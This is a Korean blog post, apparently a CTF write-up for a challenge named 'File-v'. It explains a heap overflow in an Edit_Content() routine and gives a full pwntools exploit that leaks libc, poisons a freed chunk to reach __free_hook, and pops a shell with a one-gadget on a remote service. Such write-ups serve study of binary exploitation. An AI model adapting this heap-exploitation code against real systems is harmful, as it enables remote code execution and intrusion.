티스토리 뷰

File-v

Vuln

        ccontent = input_by_size_return_malloc(content_size);
    filesize = ptr->filesize;
    v7 = content;
    v8 = malloc(ptr->filesize - ptr->content_size + content_size);
    memcpy(v8, ptr, filesize);
    v8->modify_time = time(0LL);
    filename_size = v8->filename_size;
    v8->content_size = content_size;
    memcpy(&v8->filename + (filename_size + 1), v7, content_size);

대충 손퍼징 때려보니 Edit_Content()에서 힙 오버가 났다.

v8 = malloc() 할 때, 사이즈설정을 잘못해줘서, 아래 memcpy에서 다음청크 덮을 수 있는 오버가 난다.

Fake Chunk 만들어서 청크 겹치게 만들고 Freed ChunkFD 조작해서 프리훅 할당받고, 원샷으로 쉘땃다.

Exploit

from pwn import *

p = remote("3.36.184.9", 5555)
#p = process("./file-v")
#p = process("./file-v_patched")
l = ELF('./libc-2.27.so')

def create(_size, _filename):
    p.sendafter("> ", "c")
    p.sendafter(": ", str(_size))
    p.sendafter(": ", _filename)

def select(_filename):
    p.sendafter("> ", 'b')
    p.sendafter(": ", _filename)

def back(_opt=None):
    p.sendafter("> ", "b")
    if _opt:
        p.sendafter("> ", _opt)

def edit_filename(_len, _filename):
    p.sendafter("> ", '1')
    p.sendafter(": ", str(_len))
    p.sendafter(": ", _filename)

def edit_content(_size, _filecontent):
    p.sendafter("> ", '4')
    p.sendafter(": ", str(_size))
    p.sendafter(": ", _filecontent)

def show_content():
    p.sendafter("> ", '3')

create(1, 'a')
select('flag')
edit_content(46, '\xde'*(43-0x10) + p64(0x21) + p64(0) + "\x61")
p.sendafter("> ", '5')
back()

select('a')
edit_filename(1, "a")
edit_content(100, 'b' + p64(0)*3 + p64(0x51))

back("N")
pay = p64(0xdadadadadadadada)
pay += p64(0x11)

select(pay*0x80 + p64(0) + p64(0x801))
select('a')
edit_content(100, 'q')

pay = 'qqqqqq'
pay += p64(0)
pay += p64(0x501)

edit_content(100, pay)
show_content()

libc = int(''.join(p.recvuntil("7f")[-17:].split(" ")[::-1]), 16) - 96 - 0x10 - l.sym['__malloc_hook']
log.info('[Libc] : ' + hex(libc))

pay = 'x'*6
pay += p64(0)
pay += p64(0x81)
pay += 'A'*0x10
pay += p64(0)*3
pay += p64(0x71)

pay += 'W'*2
pay += p64(0x181)
pay += p64(0)
pay += p64(0x11)

pay = pay.ljust(100, 'W')
edit_content(100, pay)
#edit_filename(10, 'a')
#edit_filename(10, 'a')

pay = 'a'*6
pay += p64(0)
pay += p64(0x101) # unsorted size
pay += p64(0x41414141414141)
#pay += p64(heap+0x2bb0)
pay += p64(libc + l.sym['__malloc_hook'] + 96 + 0x10)

pay += '\x00'*2
pay += p64(0x71)
pay += p64(libc + l.sym['__free_hook'])
pay = pay.ljust(0x70-2, 'z')
pay += '\x21\x00'
edit_content(0x70, pay)

p.sendafter("> ", 'd') # delete file

select('flag')
p.sendafter("> ", 'd') # delete file

create(0x8, '/bin/sh\x00')
select('/bin/sh\x00')

edit_content(0x40, 'q')

one = [0x10a428, 0x10a41c, 0xe5622, 0xe561e, 0xe5617, 0xe546f,0x4f432,0x4f3d5]
#pay = p64(libc + l.sym['system'])
#pay = p64(libc + 0x4f432)
#pay = p64(libc + 0x10a41c)
#pay = p64(libc + 0x4f3d5)

pay = p64(libc + one[4])
edit_content(0x60, pay)
#back("N")
p.interactive()
댓글
댓글쓰기 폼
공지사항
Total
10,365
Today
8
Yesterday
13
TAG
more
«   2022/11   »
1 2 3 4 5
6 7 8 9 10 11 12
13 14 15 16 17 18 19
20 21 22 23 24 25 26
27 28 29 30
글 보관함